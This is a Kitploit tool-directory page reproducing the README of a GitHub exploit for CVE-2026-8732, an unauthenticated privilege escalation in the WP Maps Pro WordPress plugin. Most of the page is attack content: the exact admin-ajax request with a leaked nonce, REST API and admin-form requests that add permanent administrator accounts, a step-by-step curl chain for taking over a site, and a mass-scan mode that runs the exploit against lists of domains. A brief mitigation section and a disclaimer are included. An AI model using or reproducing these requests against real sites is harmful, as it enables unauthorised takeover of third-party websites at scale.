Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-8732 — Exploit automatizado de 8 fases para CVE-2026-8732, uma escalada de privilégios não autenticada no WP Maps Pro ≤ 6.1.0. Usa multiprocessing e asyncio para escanear alvos, extrair nonces e criar contas de administrador. | Kitploit
Ferramentas/GitHubGitHub/zycoder0day/cve-2026-8732
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubzycoder0day/cve-2026-8732

CVE-2026-8732

Exploit automatizado de 8 fases para CVE-2026-8732, uma escalada de privilégios não autenticada no WP Maps Pro ≤ 6.1.0. Usa multiprocessing e asyncio para escanear alvos, extrair nonces e criar contas de administrador.

Ver Repositório
2há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

⚔️ CVE-2026-8732

WP Maps Pro ≤ 6.1.0 — Escalação de Privilégios sem Autenticação

CVSS 9.8 CRITICAL CWE-306 Python 3.8+ License MIT

Automação de Exploração em 8 Fases | Multiprocessing + Asyncio | Criação de Admin Verificada


🎯 Sobre a Vulnerabilidade

O plugin WordPress WP Maps Pro versão ≤ 6.1.0 possui uma vulnerabilidade de escalada de privilégios sem autenticação. Um atacante, sem nenhuma credencial, pode criar uma conta de administrador e assumir o controle do site.

A vulnerabilidade tem origem no recurso "Temporary Access", projetado para a equipe de suporte do fornecedor FlipperCode, mas exposto ao público sem proteção adequada.


🔥 Três Fraquezas Relacionadas

root@kitploit:~
┌──────────────────────────────────────────────────────────────┐
│  KELEMAHAN 1 — Endpoint Terekspos Tanpa Autentikasi        │
│  ▸ AJAX action didaftarkan dengan wp_ajax_nopriv_           │
│  ▸ Siapapun bisa mengakses tanpa login                      │
└──────────────────────┬───────────────────────────────────────┘
                       │
┌──────────────────────▼───────────────────────────────────────┐
│  KELEMAHAN 2 — Nonce Bocor di Halaman Publik               │
│  ▸ Objek wpgmp_local.nonce disematkan di setiap halaman    │
│  ▸ Penyerang bisa mengekstrak nonce dari HTML source        │
└──────────────────────┬───────────────────────────────────────┘
                       │
┌──────────────────────▼───────────────────────────────────────┐
│  KELEMAHAN 3 — Tidak Ada Pemeriksaan Hak Akses             │
│  ▸ Fungsi callback hanya memverifikasi nonce               │
│  ▸ Tidak ada current_user_can() — tidak ada pertahanan lain│
└──────────────────────────────────────────────────────────────┘

⚡ Cadeia de Ataque — 8 Fases

root@kitploit:~
  ┌─────────┐   ┌──────────┐   ┌──────────┐   ┌──────────┐
  │ FASE 1  │──▶│ FASE 2   │──▶│ FASE 3   │──▶│ FASE 4   │
  │ RESOLVE │   │ CHECK WP │   │ DETECT   │   │ VERSION  │
  │ HTTPS?  │   │ wp-content│   │ PLUGIN   │   │ ≤6.1.0?  │
  │ HTTP?   │   │ wp-login  │   │ wpgmp_   │   │ WAF?     │
  └─────────┘   └──────────┘   └──────────┘   └─────┬────┘
                                                      │ RENTAN
                                                      ▼
  ┌──────────────────────────────────────────────────────────┐
  │                    FASE 5 — EKSTRAKSI NONCE               │
  │                                                          │
  │  GRUP A (API)          GRUP B (Konten)      GRUP C      │
  │  ├─ M1: REST pages    ├─ M4: Sitemap XML   └─ M7: Slug  │
  │  ├─ M2: REST search   ├─ M5: Homepage links    Brute    │
  │  └─ M3: rest_route    └─ M6: RSS/Atom feed   Force     │
  │                                                          │
  │  Target: wpgmp_local.nonce = "fc-call-nonce"             │
  └──────────────────────────┬───────────────────────────────┘
                             │ NONCE DITEMUKAN
                             ▼
  ┌──────────┐   ┌──────────┐   ┌──────────┐
  │ FASE 6   │──▶│ FASE 7   │──▶│ FASE 8   │
  │ EXPLOIT  │   │ VERIFY   │   │ ADD ADMIN│
  │ POST AJAX│   │ Magic URL│   │ PERMANEN │
  │ nonce+   │   │ Cookie   │   │ REST API │
  │ check_   │   │ login    │   │ WP-Admin │
  │ temp=false│   │ check    │   │ Form     │
  └──────────┘   └──────────┘   └──────────┘
                                       │
                                       ▼
                               ✅ ADMIN DIBUAT
                               Login: wp_xxxx / pass
                               Role: administrator

Detalhes de Cada Fase


🛠️ Métodos de Ataque

Método 1: Exploração Principal — Criação de Admin sem Autenticação

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=wpgmp_temp_access_ajax
nonce=<EKSTRAKSI_NONCE>
check_temp=false

Resposta se vulnerável:

root@kitploit:~
{"url":"https://target.com/?wpgmp_access=abc123def456"}

Esta magic URL fornece login automático como fc_user_XXXXX (função: administrator).

Método 2: Adicionar Admin Permanente via REST API

root@kitploit:~
POST /wp-json/wp/v2/users HTTP/1.1
Host: target.com
X-WP-Nonce: <REST_NONCE>
Content-Type: application/json

{
  "username": "wp_xxxxxxxx",
  "email": "user@localhost",
  "password": "Str0ng!Pass#2026",
  "roles": ["administrator"]
}

Método 3: Adicionar Admin via Formulário WP-Admin (Reserva)

root@kitploit:~
POST /wp-admin/user-new.php HTTP/1.1
Host: target.com
Cookie: [admin_cookies]
Content-Type: application/x-www-form-urlencoded

user_login=wp_xxxxxxxx
email=user@localhost
pass1=Str0ng!Pass#2026
pass2=Str0ng!Pass#2026
pw_weak=1                       <-- KUNCI: konfirmasi password lemah
role=administrator
createuser=Add New User
_wpnonce_create-user=<NONCE>

Ponto-chave: pw_weak=1 deve ser incluído — o WordPress rejeita senhas fracas sem este parâmetro.


📐 Arquitetura

root@kitploit:~
CVE-2026-8732.py
│
├── 📦 NonceFinder — Pencari nonce dengan 7 metode
│   ├── Grup A (API): M1 REST pages, M2 REST search, M3 rest_route
│   ├── Grup B (Konten): M4 Sitemap, M5 Homepage links, M6 RSS feed
│   └── Grup C (Paksa): M7 Slug brute force (30+ slug umum)
│
├── ⚔️ Exploiter — Mesin eksploitasi 8 fase
│   ├── resolve()           → Fase 1: Pemilihan protokol
│   ├── check_wp()           → Fase 2: Verifikasi WordPress
│   ├── detect_plugin()      → Fase 3: Deteksi plugin + early nonce
│   ├── detect_version()     → Fase 4: Deteksi versi + WAF
│   ├── exploit()            → Fase 6: Eksploitasi inti
│   ├── verify()             → Fase 7: Verifikasi login admin
│   └── add_admin()          → Fase 8: Tambah admin permanen
│
├── 🔧 Worker Process — Proses pekerja multiprocessing
│   ├── producer()           → Baca domain dari mp.Queue
│   └── consumer() (N)       → Eksekusi scan paralel
│
└── 🖥️ Scanner — Antarmuka pengguna
    ├── single()             → Mode target tunggal (interaktif)
    └── multi()              → Mode multi-target (massal)

Fluxo de Dados

root@kitploit:~
  targets.txt          mp.Queue (tugas)         asyncio.Queue
  ┌─────────┐    ┌─────────────────┐    ┌──────────────────┐
  │ domain1 │───▶│  domain queue   │───▶│  internal queue  │
  │ domain2 │    │  (IPC antara    │    │  (per proses)    │
  │ domain3 │    │   proses)       │    └────────┬─────────┘
  │  ...    │    └─────────────────┘              │
  └─────────┘                          ┌─────────▼──────────┐
                                       │   Konsumen (N)      │
                                       │   Exploiter.scan()  │
                                       │   8 fase lengkap    │
                                       └─────────┬──────────┘
                                                 │
                                       ┌─────────▼──────────┐
                                       │  mp.Queue (hasil)   │──▶ vuln.txt
                                       │  + JSON + TXT       │    + debug.log
                                       └────────────────────┘

🚀 Uso

Instalação

root@kitploit:~
pip install aiohttp

Modo Alvo Único

root@kitploit:~
python3 CVE-2026-8732.py
root@kitploit:~
  [?] Pilih mode:
      1. Single Target
      2. Multi Target (file list)

  > 1

  [?] Target domain (tanpa http/https): target.com
  [?] Timeout [default: 15]: 15

Modo Multi-Alvo (Em Massa)

root@kitploit:~
python3 CVE-2026-8732.py
root@kitploit:~
  [?] Pilih mode:
      1. Single Target
      2. Multi Target (file list)

  > 2

  [?] Path file target (.txt): targets.txt
  [?] Jumlah process [default: 10]: 10
  [?] Concurrency per process [default: 50]: 50
  [?] Timeout per request [default: 10]: 10
  [?] Output file [default: vuln.txt]: vuln.txt
  [?] Debug mode? (y/n) [default: n]: y

Exemplo Manual com curl

root@kitploit:~
# LANGKAH 1: Ekstrak nonce dari halaman frontend
NONCE=$(curl -sk https://target.com/ | grep -oP '"nonce"\s*:\s*"\K[a-f0-9]{10}')
echo "Nonce: $NONCE"

# LANGKAH 2: Kirim payload eksploitasi
RESPONSE=$(curl -sk -X POST https://target.com/wp-admin/admin-ajax.php \
  -d "action=wpgmp_temp_access_ajax&nonce=$NONCE&check_temp=false")
echo "Response: $RESPONSE"

# LANGKAH 3: Akses magic URL untuk login sebagai admin
MAGIC_URL=$(echo $RESPONSE | python3 -c "import sys,json; print(json.load(sys.stdin)['url'])")
curl -sk -L -c cookies.txt "$MAGIC_URL"

# LANGKAH 4: Verifikasi akses admin
curl -sk -b cookies.txt https://target.com/wp-admin/profile.php | grep 'id="user_login"'

# LANGKAH 5: Buat admin permanen via REST API atau WP-Admin form

📊 Condições de Exploração

O admin é criado com sucesso SE E SOMENTE SE ambas as condições forem atendidas:

root@kitploit:~
  ┌───────────────┐    ┌───────────────┐
  │  KONDISI 1    │ AND│  KONDISI 2    │
  │  Versi ≤6.1.0│    │  GOLD AKTIF   │
  │               │    │               │
  └───────┬───────┘    └───────┬───────┘
          │                    │
          ▼                    ▼
  Aksi nopriv        WPGMP_Temp_
  masih terdaftar    Access tersedia
          │                    │
          └────────┬─────────┘
                   ▼
             ✅ ADMIN DIBUAT
Se a Condição FalharResultado
Versão ≥ 6.1.1❌ CORRIGIDA — Ação wp_ajax_nopriv_ removida
GOLD inativo⚠️ PHP CRASH — A classe WPGMP_Temp_Access não existe

📁 Estrutura de Arquivos

root@kitploit:~
CVE-2026-8732/
├── CVE-2026-8732.py      # Skrip eksploitasi otomatis
├── README.md              # Dokumentasi proyek (file ini)
└── LICENSE                # MIT License

⚙️ Tecnologia


🛡️ Mitigação

Se você é proprietário de um site que utiliza o WP Maps Pro:

  1. Atualize para a versão 6.1.1 ou superior — Isso corrigirá a vulnerabilidade
  2. Garanta que o addon GOLD esteja ativo — Se o GOLD estiver instalado, mas inativo, o site fica em estado vulnerável (crash durante a exploração, mas a ação perigosa permanece exposta)
  3. Instale um WAF (Wordfence / Sucuri) para bloquear POSTs para admin-ajax.php
  4. Desative o endpoint de usuários da REST API — Ele vaza a lista de usuários
  5. Limite as tentativas de login — Previna força bruta

📜 Licença

root@kitploit:~
MIT License

Copyright (c) 2026 XENON1337

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

⚠️ Aviso Legal

ESTA FERRAMENTA É APENAS PARA USO LEGÍTIMO. Utilize somente em sistemas que você possui ou para os quais tem autorização explícita para testar. O uso sem autorização é ILEGAL e ANTIÉTICO. O autor não se responsabiliza pelo uso indevido desta ferramenta.


Criado por XENON1337

Baixar ferramenta
InformaçãoDetalhe
CVECVE-2026-8732
CVSS9.8 (CRÍTICO) — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
PluginWP Maps Pro (wp-google-map-gold)
FornecedorFlipperCode
Versões Afetadas≤ 6.1.0
Versão Corrigida6.1.1
TipoMissing Authentication for Critical Function (CWE-306)
ImpactoCriação de admin sem autenticação → controle total do site
Autor do PoCXENON1337
FaseNomeFunçãoRequisições
1ResolveEscolhe HTTPS/HTTP em paralelo1
2Check WPVerifica se o alvo é WordPress0
3Detect PluginVerifica indicadores do WP Maps em 3 camadas0-4
4Version + WAFLê readme.txt / CSS ?ver= + detecta WAF1
5Ekstraksi Nonce7 métodos de busca em 3 grupos paralelos0-150
6EksploitasiPOST em admin-ajax.php → cria conta de admin temporária1
7VerifikasiAcessa magic URL → confirma sessão de admin2
8Tambah AdminREST API (principal) + formulário WP-Admin (reserva)4
ComponenteTecnologiaFunção
Cliente HTTPaiohttpRequisições HTTP assíncronas com pooling de conexões
Paralelismoasyncio + multiprocessingMultiprocessamento + async por processo
Fila IPCmp.QueueComunicação entre o processo principal e os workers
CookieCookieJar(unsafe=True)Lida com redirecionamentos entre domínios
Timeoutasyncio.wait_forTempo limite por alvo (25 segundos)